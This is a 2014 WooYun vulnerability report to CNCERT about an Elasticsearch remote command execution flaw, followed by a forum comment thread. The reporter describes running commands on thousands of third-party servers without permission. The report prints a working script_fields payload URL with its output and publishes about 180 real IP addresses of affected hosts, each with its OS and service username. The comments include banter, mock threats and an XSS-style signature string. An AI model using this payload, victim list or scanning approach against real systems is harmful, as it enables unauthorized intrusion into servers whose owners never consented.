当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066218

漏洞标题:我是如何在2小时内组建"5000+集群服务器僵尸网络"的

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2014-06-25 19:00

修复时间:2014-08-09 19:02

公开时间:2014-08-09 19:02

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-25: 细节已通知厂商并且等待厂商处理中
2014-06-29: 厂商已经确认,细节仅向厂商公开
2014-07-09: 细节向核心白帽子及相关领域专家公开
2014-07-19: 细节向普通白帽子公开
2014-07-29: 细节向实习白帽子公开
2014-08-09: 细节向公众公开

简要描述:

2小时之内顺利在5000多台服务器上输出hello world. @cncert国家互联网应急中心

详细说明:

由于Elasticsearch命令执行漏洞,导致上万服务器受影响,截图所有ip无重复。2小时之内顺利在5000多台服务器上执行相关命令。

2.png


本次仅是技术测试漏洞影响范围,标题党了。国内测试700台集群服务器,成功了170多台。所有测试当中仅测试了1.4w ip成功率接近50%.

漏洞证明:

执行POC:

http://xx.xx.xx.xx:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22String%20str%3DSystem.getProperty(\%22os.name\%22)%2b\%22-\%22%2bSystem.getProperty(\%22user.name\%22);\%22[os:\%22%2bstr.toString()%2b\%22/]\%22;%22}}}


结果如下:

1.png


{"took":7,"timed_out":false,"_shards":{"total":5,"successful":5,"failed":0},"hits":{"total":140847,"max_score":1.0,"hits":[{"_index":"cai","_type":"loganalysis","_id":"f2bb7c30-ab55-11e3-9940-22000a9a8b23","_score":1.0,"fields":{"exp":"[os:Linux-ec2-user/]"}}]}}


返回了当前操作系统类型和当前用户运行Elasticsearch的用户名。
国内受影响IP:

114.112.172.45:Linux-elasticsearch
60.190.240.74:Linux-admin
218.247.15.110:Linux-root
119.254.106.156:Linux-root
112.124.6.156:Linux-root
112.65.228.5:Linux-yxtuser
112.124.68.214:Linux-root
183.129.178.138:Linux-admin
123.127.114.28:Linux-root
123.127.114.32:Linux-root
114.113.156.235:Linux-root
210.26.182.133:Windows Server 2008 R2-tlm
183.60.244.17:Linux-admin
124.248.40.56:Linux-elasticsearch
115.29.160.208:Linux-elasticsearch
222.180.136.70:Linux-logbase
123.125.105.198:Linux-root
59.175.153.24:Linux-root
210.14.154.135:Linux-yada
118.186.12.154:Linux-root
219.232.240.226:Linux-spider
210.34.4.113:Linux-neversion
59.175.153.28:Linux-root
115.29.221.214:Linux-root
202.204.32.142:Windows Server 2008-Administrator
42.96.147.212:Linux-elasticsearch
210.192.125.137:Linux-elasticsearch
114.80.158.118:Linux-webuser
121.192.191.166:Linux-neversion
166.111.135.27:Linux-elasticsearch
219.223.190.244:Linux-root
42.62.26.149:Linux-elasticsearch
101.251.193.21:Linux-root
218.200.15.238:Linux-root
115.28.42.126:Linux-elasticsearch
113.107.226.170:Linux-root
218.205.65.249:Linux-admin
210.14.137.102:Linux-elasticsearch
111.11.197.146:Linux-root
117.27.143.230:Linux-dev
42.96.194.176:Linux-root
115.29.188.127:Linux-elasticsearch
115.29.145.164:Linux-elasticsearch
210.26.182.134:Windows Server 2008 R2-tlm
112.124.68.10:Linux-root
210.192.125.141:Linux-elasticsearch
101.251.193.22:Linux-root
202.91.235.47:Linux-doit
180.153.154.140:Linux-elasticsearch
115.28.151.48:Linux-tomcat7
218.108.129.141:Linux-www
219.140.191.206:Linux-root
210.14.154.136:Linux-yada
203.195.193.90:Linux-elasticsearch
61.164.118.194:Linux-root
60.190.1.83:Windows Server 2008 R2-WIN-AR35FQEMOPC$
202.194.7.250:Linux-root
221.6.207.222:Linux-mota
219.136.249.94:Linux-elasticsearch
121.199.19.79:Linux-elasticsearch
210.5.152.69:Linux-elasticsearch
61.152.123.139:Linux-root
115.29.32.56:Linux-root
121.52.229.225:Linux-root
122.224.243.172:Windows Server 2008 R2-IWEB12$
222.192.61.8:Windows Server 2008 R2-WIN-KFLPLV06RH2$
180.153.177.169:Windows Server 2008 R2-Administrator
202.114.177.32:Linux-elasticsearch
211.153.33.201:FreeBSD-root
103.29.133.165:Linux-admin
211.155.229.2:Linux-doit
42.159.7.88:Linux-elasticsearch
202.192.149.91:Linux-elasticsearch
123.150.207.181:Linux-elasticsearch
202.197.77.3:Linux-root
114.80.158.119:Linux-webuser
220.231.128.242:Linux-root
114.80.158.117:Linux-webuser
59.175.153.94:Linux-root
124.207.188.72:Linux-elasticsearch
121.52.232.27:Linux-admin
202.99.230.148:Linux-elasticsearch
210.32.158.117:Windows Server 2008-Administrator
121.52.213.92:Linux-tankai
222.192.61.9:Windows Server 2008 R2-WIN-FBH6CANACHV$
175.102.33.122:Linux-root
211.155.86.118:Linux-elasticsearch
61.164.112.9:Linux-root
210.73.221.26:Linux-elasticsearch
124.127.201.53:Windows Server 2008 R2-Administrator
118.193.128.202:Linux-root
59.151.86.9:Windows Server 2008 R2-cobazaaradmin
202.192.149.90:Linux-elasticsearch
123.101.0.77:Linux-es
218.94.42.3:Windows 2003-SYSTEM
125.210.209.154:Linux-ec
58.215.139.124:Linux-root
121.199.41.168:Linux-site
60.194.51.18:Linux-elasticsearch
210.51.190.22:Linux-root
180.153.224.122:Linux-root
119.2.0.195:Linux-wubin
166.111.7.105:Linux-aminer
42.96.168.215:Linux-medium
218.108.28.133:Linux-root
121.199.31.235:Linux-elasticsearch
124.207.188.106:Linux-elasticsearch
112.124.103.71:Linux-elasticsearch
121.199.14.195:Linux-elasticsearch
183.129.160.157:Linux-root
59.61.77.4:Linux-elasticsearch
124.95.161.235:Linux-elasticsearch
183.63.149.105:Linux-elasticsearch
118.122.124.188:Linux-elasticsearch
223.4.146.165:Windows Server 2008 R2-WHZD011249$
210.34.4.74:Linux-badboy
202.197.77.1:Linux-root
124.207.188.104:Linux-elasticsearch
218.17.162.90:Windows 2003-SYSTEM
124.248.40.55:Linux-elasticsearch
59.175.153.37:Linux-root
42.62.30.204:Linux-elasticsearch
121.194.2.202:Linux-elasticsearch
62.141.60.253:Linux-elasticsearch
59.106.177.123:Linux-elasticsearch
85.158.182.229:Linux-elasticsearch
162.243.52.4:Linux-elasticsearch
50.97.245.37:Linux-data
192.3.17.46:Linux-root
46.252.21.82:Linux-elasticsearch
95.128.179.92:Linux-elasticsearch
54.199.202.180:Linux-elasticsearch
54.72.186.95:Linux-elasticsearch
184.69.206.134:Linux-elasticsearch
107.170.149.193:Linux-elasticsearch
138.91.191.171:Windows Server 2012-ECOSEARCH$
77.120.101.131:Linux-elasticsearch
95.85.30.247:Linux-elasticsearch
62.210.239.230:Linux-elasticsearch
23.253.35.234:Linux-elasticsearch
85.25.100.198:Linux-elasticsearch
162.243.6.243:Linux-elasticsearch
115.28.153.62:Linux-ringtone
82.95.165.31:Linux-elasticsearch
54.204.149.163:Linux-elasticsearch
206.221.150.100:Linux-elasticsearch
218.241.236.109:Linux-lda
199.80.52.216:Linux-elasticsearch
62.210.215.14:Linux-elasticsearch
46.36.216.71:Linux-elasticsearch
54.255.38.134:Linux-deploy
54.72.78.222:Linux-elasticsearch
162.242.241.223:Linux-elasticsearch
54.251.248.168:Linux-elasticsearch
217.67.30.84:FreeBSD-elasticsearch
89.31.96.201:Linux-elasticsearch
151.236.216.20:Linux-elasticsearch
95.142.163.212:Linux-elasticsearch
23.253.125.187:Linux-elasticsearch
208.94.234.177:Linux-elasticsearch
162.243.37.251:Linux-elasticsearch
178.33.253.101:Linux-julien
178.211.56.101:Windows Server 2008 R2-WIN-ROLMAN9Q7K6$
107.178.214.245:Linux-elasticsearch
46.252.21.183:Linux-elasticsearch
78.140.183.200:SunOS-root
153.121.43.197:Linux-elasticsearch
54.72.222.1:Linux-elasticsearch
162.13.184.118:Linux-elasticsearch
178.170.104.38:Linux-elasticsearch
54.221.61.224:Linux-elasticsearch
54.196.20.198:Linux-elasticsearch
23.253.170.86:Linux-elasticsearch
94.23.222.203:Linux-root

修复方案:

限制ip访问

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-06-29 21:34

厂商回复:

CNVD对该漏洞已经进行过一轮对政府部门的巡检,至27日,暂时只发现一例政府部门受影响案例。对于所述漏洞,已经由CNVD技术组单位知道创宇公司(zoomeye)协助完成对全网的检测,持续开展对重点用户的IP排查。对于批量检测,比较符合CNCERT全网应急的工作思路,鼓励。rank 20

最新状态:

暂无


漏洞评价:

评论

  1. 2014-06-25 19:02 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    怎么想起CS僵尸模式呢。。

  2. 2014-06-25 19:02 | 漏漏 ( 路人 | Rank:2 漏洞数:1 | .............)

    你以为乌云有这么多人跟你聊天吗? 还不是我一个人再跟你聊天,不信我换个马甲

  3. 2014-06-25 19:03 | 安然意境 ( 普通白帽子 | Rank:189 漏洞数:79 | 无论是你的事业还是你的个人,可能走的过程...)

    这是我的马甲1

  4. 2014-06-25 19:03 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    这个腻害!

  5. 2014-06-25 19:04 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    留名!

  6. 2014-06-25 19:04 | 漏漏 ( 路人 | Rank:2 漏洞数:1 | .............)

    @疯狗 被你占了 坑! @肉肉

  7. 2014-06-25 19:08 | 浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )

    哇塞,我好像组建一个僵尸网络!美国来了我就D他!

  8. 2014-06-25 19:25 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    看出撸主是个程序员.

  9. 2014-06-25 19:45 | Anonymous ( 普通白帽子 | Rank:146 漏洞数:30 | 园长是大傻逼)

    @园长- -

  10. 2014-06-25 19:46 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)

    我预测 此贴必火

  11. 2014-06-25 19:49 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  12. 2014-06-25 19:52 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    ...

  13. 2014-06-25 19:57 | 蓝颜 ( 实习白帽子 | Rank:42 漏洞数:29 )

    这是我的马甲2

  14. 2014-06-25 20:13 | 破锁 ( 路人 | Rank:23 漏洞数:6 )

    求细节

  15. 2014-06-25 20:14 | 阿萨帝 ( 实习白帽子 | Rank:91 漏洞数:68 | 不发礼物的索要联系方式都是耍流氓。)

    求细节

  16. 2014-06-25 20:15 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    这个必须关注~~~

  17. 2014-06-25 20:36 | 马杀鸡 ( 路人 | Rank:21 漏洞数:5 | 作为一匹勇敢的马,杀鸡是必不可少的)

    弱口令?

  18. 2014-06-25 20:37 | 索马里的海贼 ( 普通白帽子 | Rank:254 漏洞数:24 | http://tieba.baidu.com/f?kw=WOW)

    这是我的马甲3

  19. 2014-06-25 20:57 | 无名指7年 ( 路人 | Rank:15 漏洞数:4 | 努力学习奋斗,争取成为一名合格的白帽子。)

    这么吊 坐等细节

  20. 2014-06-25 21:03 | s3xy ( 核心白帽子 | Rank:832 漏洞数:113 | 相濡以沫,不如相忘于江湖)

    mark

  21. 2014-06-25 21:10 | f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)

    雷劈了!mark

  22. 2014-06-25 21:11 | 他是个撸丝 ( 路人 | Rank:17 漏洞数:3 | 我有一头小毛驴啊,我就是不敢骑)

    这是我的马甲4

  23. 2014-06-25 21:14 | nextdoor ( 普通白帽子 | Rank:325 漏洞数:74 )

    mark

  24. 2014-06-25 21:15 | 失落宝宝 ( 路人 | Rank:2 漏洞数:2 | -.-)

    咋这么牛逼呢..

  25. 2014-06-25 21:25 | F4K3R ( 普通白帽子 | Rank:297 漏洞数:31 | 学习)

    这么牛逼的标题~果断mark!

  26. 2014-06-25 21:35 | 夏殇 ( 路人 | Rank:30 漏洞数:21 | 不忘初心,方得始终。)

    火钳刘明

  27. 2014-06-25 21:41 | 4399gdww ( 路人 | Rank:20 漏洞数:4 | )

    这是我的马甲5000

  28. 2014-06-25 21:47 | cncert国家互联网应急中心(乌云厂商)

    虽然是通用软件漏洞,但标题是不明觉厉。对于该漏洞,CNVD已经排查过政府网站,对于IP的全网扫描,未全部进行。但会对重点用户进行排查。

  29. 2014-06-25 21:49 | 李白 ( 普通白帽子 | Rank:142 漏洞数:29 )

    虽然是通用软件漏洞,但标题是不明觉厉。对于该漏洞,CNVD已经排查过政府网站,对于IP的全网扫描,未全部进行。但会对重点用户进行排查。

  30. 2014-06-25 21:50 | 小马 ( 实习白帽子 | Rank:90 漏洞数:23 | 无个性不签名)

    难道前段时间打facebook的就是楼主

  31. 2014-06-25 22:04 | Z-0ne 认证白帽子 ( 普通白帽子 | Rank:559 漏洞数:38 | 目前专注于工控安全基础研究,工业数据采集...)

    开个玩笑这可比卡机快多了

  32. 2014-06-25 22:19 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    我这有2w+ 逗比 算通用么 照这描述 我1分钟内脚本就能getshell1w+服务器僵尸网络吧 加雷?想不通

  33. 2014-06-25 22:22 | sec_jtn ( 普通白帽子 | Rank:134 漏洞数:56 | 本想无耻的刷rank,最后发现是我想太多了。...)

    这是我的马甲5

  34. 2014-06-25 22:30 | CplusHua ( 普通白帽子 | Rank:238 漏洞数:33 | 乌云奖金:-1)

    puppet ?

  35. 2014-06-25 22:37 | 方Now ( 路人 | Rank:21 漏洞数:2 | 我只是只菜鸟。。)

    这是我的马甲6

  36. 2014-06-25 22:48 | f1t2y ( 路人 | Rank:6 漏洞数:3 | 为人驱使者为奴,为人尊处者为客)

    这是我的马甲7

  37. 2014-06-25 22:54 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    这是我的马甲8 会写点代码挺好的

  38. 2014-06-25 23:13 | 小学生 ( 实习白帽子 | Rank:40 漏洞数:1 | 我是小学生)

    @淡漠天空 这是为了预警,不是为了刷分。SB,你这么牛X为什么不把你2w多的发出来啊。不服周末出来PK

  39. 2014-06-25 23:42 | 发条橙子 ( 路人 | Rank:19 漏洞数:6 | ∑(っ °Д °;)っ)

    目测DEDE

  40. 2014-06-26 04:01 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    @小学生 说话不经大脑?早就给园长和CNVD验证的看过 需要随时可以提供 要刷分早就刷了?不服周末广州求PK 不谢

  41. 2014-06-26 08:39 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    为了怎么屁大点事儿就吵起来了,弱弱的问句,需要裁判吗?

  42. 2014-06-26 09:07 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    火了。。

  43. 2014-06-26 09:34 | LauRen ( 路人 | Rank:4 漏洞数:1 | 苦逼屌丝一枚。)

    蜻蜓队长前来助阵

  44. 2014-06-26 09:48 | roker ( 普通白帽子 | Rank:357 漏洞数:108 )

    为了怎么屁大点事儿就吵起来了,弱弱的问句,需要裁判吗?

  45. 2014-06-26 09:56 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    喂,开下门。教我java

  46. 2014-06-26 09:58 | 园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)

    @淡漠天空 哈哈,笑死我了。。人家这么欺负你,你怎么不咬他啊?打不赢我帮忙。

  47. 2014-06-26 10:03 | Mr.Jen ( 路人 | Rank:13 漏洞数:2 | 开放自由)

    此条必火,前排占座

  48. 2014-06-26 10:16 | 小学生 ( 实习白帽子 | Rank:40 漏洞数:1 | 我是小学生)

    @淡漠天空 汪汪,@我表哥广州,他说周末去砍你。

  49. 2014-06-26 10:31 | onlycjeg ( 实习白帽子 | Rank:38 漏洞数:5 | 我就看看,我不说话.)

    你以为乌云有这么多人跟你聊天吗? 还不是我一个人再跟你聊天,不信我换个马甲

  50. 2014-06-26 10:32 | ahnhhh ( 路人 | Rank:5 漏洞数:1 | 你在乌云这么吊,你家人知道么?)

    哈哈我来了。。我再换个。。。。。不信你看下面!!

  51. 2014-06-26 11:15 | 一把破刀 ( 路人 | Rank:14 漏洞数:5 | 好好学习,天天向上!)

    第一次在乌云看到人吵架,果断围观

  52. 2014-06-26 11:22 | 小学生 ( 实习白帽子 | Rank:40 漏洞数:1 | 我是小学生)

    @淡漠天空 号称乌云第一大装B小王子,最近似乎很低调啊。

  53. 2014-06-26 12:06 | 小火苗 ( 路人 | Rank:6 漏洞数:1 | 我是一只小火苗呀,春风吹又生呀...)

    @淡漠天空 号称乌云第一大装B小王子,是真的吗?

  54. 2014-06-26 12:20 | 小学生 ( 实习白帽子 | Rank:40 漏洞数:1 | 我是小学生)

    @淡漠天空 不逗你了,只能告诉你我表哥是 @VIP,我表哥的表哥是 @z7y so 不管你是在广州还是在北京、天津 放学都不要走。谁叫小学生就是这么没节操~

  55. 2014-06-26 12:34 | 小威 ( 普通白帽子 | Rank:492 漏洞数:76 | 活到老,学到老!)

    小学生就是叼,各种表哥都有,社会青年表示愿意交保护费,求罩!

  56. 2014-06-26 12:47 | 嘿ME ( 实习白帽子 | Rank:50 漏洞数:6 | http://zhangtory.com)

    求前排的各种大神罩

  57. 2014-06-26 13:35 | x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )

    @嘿ME @小威 我们这边的罩分很多中 A ,B,C ,D,F还有各种型号,请问您要那种?我们这还提供空系等等,要那种

  58. 2014-06-26 13:42 | 0x2b ( 实习白帽子 | Rank:51 漏洞数:12 )

    @淡漠天空 只要包路费 帮你砍到底

  59. 2014-06-26 14:19 | 海绵宝宝 ( 普通白帽子 | Rank:243 漏洞数:50 | 唯有梦想与好姑娘不可辜负.)

    能动手的尽量别吵吵啊,蜻蜓队长前来助阵

  60. 2014-06-26 14:30 | 核攻击 ( 实习白帽子 | Rank:35 漏洞数:7 | 统治全球,奴役全人类!毁灭任何胆敢阻拦的...)

    前排围观。

  61. 2014-06-26 14:37 | sky ( 实习白帽子 | Rank:94 漏洞数:33 | 有一天,我带着儿子@jeary 去@园长 的园长...)

    @核攻击 @核攻击 后排了。咱俩往前面挤挤?

  62. 2014-06-26 18:50 | magerx ( 普通白帽子 | Rank:257 漏洞数:45 | 别说话。)

    噗。

  63. 2014-06-26 19:45 | jeary ( 普通白帽子 | Rank:296 漏洞数:106 | (:‮.kcaH eb nac gnihtynA))

    路过的~

  64. 2014-06-26 21:14 | 雷少 ( 实习白帽子 | Rank:80 漏洞数:31 | 热爱网络的爱好者,需求同道中人。)

    路过留个名啥的,弱弱的说喜欢火影忍者的顶起。今晚更新

  65. 2014-06-26 22:32 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    selina 13:00:17 - -.我去问问是谁。selina 13:00:21 感觉现在太多傻逼了selina 13:00:23 马甲什么的。selina 13:03:00 看他的打字selina 13:03:06 汪汪的话selina 13:03:09 应该是园长以前群里的请允许我呵呵呵 表哥的表哥来打我?开玩笑装逼是有限度的 别在别人心烦时来惹事 下次把嘴巴擦干净

  66. 2014-06-26 22:33 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    我TM都懒得@了 不服来搞 嘴巴不干净的东西

  67. 2014-06-27 00:24 | 兔兔侠 ( 路人 | Rank:2 漏洞数:1 )

    是我小号发的,哈哈乌云就我和你对话,我马甲很多不信我叫我表哥@猪猪侠和你说话

  68. 2014-06-27 09:10 | 小葵 ( 实习白帽子 | Rank:84 漏洞数:11 | 我们是害虫,我们是害虫!)

    这是我的马甲9 我草~ 来晚了 精彩继续啊

  69. 2014-06-27 13:14 | sky ( 实习白帽子 | Rank:94 漏洞数:33 | 有一天,我带着儿子@jeary 去@园长 的园长...)

    @淡漠天空 逗比- -我们大表哥 分分钟蓝屏溢出你

  70. 2014-07-23 20:32 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    国内测试700台集群服务器,成功了170多台。所有测试当中仅测试了1.4w ip成功率接近50%求指点:这个50%怎么计算的???

  71. 2014-07-24 13:07 | 懒懒滴1994 ( 实习白帽子 | Rank:55 漏洞数:24 | 偶尔是个乖乖仔,不作恶,世界从来没有安全...)

    这是我的马甲8

  72. 2014-07-29 18:18 | Coffee ( 普通白帽子 | Rank:144 漏洞数:15 | Corie, a student of RDFZ.)

    还木有公开...

  73. 2014-07-29 21:42 | x7iao ( 普通白帽子 | Rank:348 漏洞数:41 | 文能床上控萝莉,武能床上定人妻)

    大失所望。

  74. 2014-08-09 20:32 | chinakid ( 路人 | Rank:6 漏洞数:3 | 小白一枚,爱好美女。)

    好屌的样子

  75. 2014-08-09 22:08 | 不知道2017 ( 路人 | Rank:26 漏洞数:6 | 专注信息安全领域)

  76. 2014-08-10 01:11 | 小小鸟 ( 路人 | Rank:8 漏洞数:6 | 小白一个)

    @小学生 第一!绝对不意气用事!第二!绝对不漏判任何一件坏事!第三!绝对裁判的公正漂亮!裁判机器人蜻蜓队长前来进见!这场争夺战由我来做裁判!蜻蜓队长豪马灯!这场比赛的项目是刷RANK之战

  77. 2014-08-10 15:36 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    感觉好厉害,看不太懂!!